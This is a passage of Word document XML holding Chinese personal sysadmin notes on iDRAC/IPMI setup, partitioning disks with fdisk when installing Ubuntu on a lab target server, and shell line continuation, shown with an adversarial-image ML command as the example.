    <w:p w14:paraId="7F5C23A9" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、设置密码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0F6E5" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Menu Overview -&gt; IDRAC SETTINGS -&gt; User Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C6344" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; Click on the userID of your admin account -&gt; Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55990AC2" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>-&gt; check "change your password" checkbox and enter the same (or new) password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E9342" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>-&gt; Apply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA44290" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、启动</w:t>
      </w:r>
      <w:r>
        <w:t>ipml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9A6441" w14:textId="58CAD1B0" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="440DA382" wp14:editId="3693A26C">
            <wp:extent cx="5274310" cy="2681605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1946481917" name="图片 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81917" name="图片 2" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>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2681605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004F891" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>测试命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C09C2F" w14:textId="142FC176" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A469701" wp14:editId="7F630124">
            <wp:extent cx="5274310" cy="662305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="633106788" name="图片 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06788" name="图片 1" descr="手机屏幕的截图&#10;&#10;描述已自动生成"/>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662305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3471D2" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFF485A" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F876DF9" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://stackoverflow.com/questions/51948745/error-unable-to-establish-ipmi-v2-rmcp-session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3992DC06" w14:textId="77777777" w:rsidR="008C5830" w:rsidRDefault="008C5830" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://bean-li.github.io/%E9%80%9A%E8%BF%87ipmitool%E8%8E%B7%E5%8F%96%E5%90%84%E5%85%83%E4%BB%B6%E7%9A%84%E6%B8%A9%E5%BA%A6%E4%BF%A1%E6%81%AF/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C1678" w14:textId="77777777" w:rsidR="00A54519" w:rsidRPr="008C5830" w:rsidRDefault="00A54519" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FF7511" w14:textId="3D5E13EE" w:rsidR="00A54519" w:rsidRDefault="007C7EC0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc159779634"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装操作系统学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w14:paraId="0FE07C0B" w14:textId="77777777" w:rsidR="00A54519" w:rsidRDefault="00A54519" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C06BF3E" w14:textId="00367AF7" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>023.12.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我在阳泉国网安装了一个服务器当靶机使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45798FB0" w14:textId="419F91DE" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ventoy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubutu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，在选择磁盘分区，选择磁盘安装的那一步，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trl+alt+F2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tty</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以就手进行分区操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580EBC0B" w14:textId="77777777" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627FB62F" w14:textId="0CFA840C" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsblk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blkid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fdisk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看磁盘有无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nvme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（固态），直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除全部分区重新分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A9A54C" w14:textId="56FFA0CE" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>boot/efi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，标识（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的标识为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的标识为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filesystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后系统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接挂载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A0A08" w14:textId="77777777" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5E4339" w14:textId="552190ED" w:rsidR="002E2CAE" w:rsidRDefault="00F04ACA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于其他硬盘，可以随意分，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kfs.btrfs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化后，再挂载到某目录下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6338E70A" w14:textId="77777777" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B08D2E0" w14:textId="77777777" w:rsidR="002E2CAE" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E5B48C" w14:textId="77777777" w:rsidR="002E2CAE" w:rsidRPr="000067A6" w:rsidRDefault="002E2CAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556B0B5D" w14:textId="77777777" w:rsidR="00792AD5" w:rsidRDefault="00792AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004BAC42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Toc159779635"/>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w14:paraId="721C158C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A739732" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc159779636"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换行相关的操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="7F7C1A46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令太长需要续行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5708E9B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数太长，一般可取续行符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行参数换行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>续行。反斜杠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面紧跟回车，表示下一行是当前行的续行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFAD5BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E69FB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下的代码所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89B9C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python target_attack.py \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A7A9CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --input_dir="${INPUT_DIR}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A2060" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --output_dir="${OUTPUT_DIR}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A28C2DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --max_epsilon="${MAX_EPSILON}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C876C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --checkpoint_path_adv_inception_v3=adv_inception_v3.ckpt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D813F48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --checkpoint_path_ens3_adv_inception_v3=ens3_adv_inception_v3.ckpt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02656D39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --checkpoint_path_ens4_adv_inception_v3=ens4_adv_inception_v3.ckpt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BE2CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --checkpoint_path_ens_adv_inception_resnet_v2=ens_adv_inception_resnet_v2.ckpt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D883B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --checkpoint_path_adv_inception_resnet_v2=adv_inception_resnet_v2.ckpt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4167D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --iterations=11 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138D345" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  --prob=0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DD68F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09ECF349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623DE7FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印换行的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA0F7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
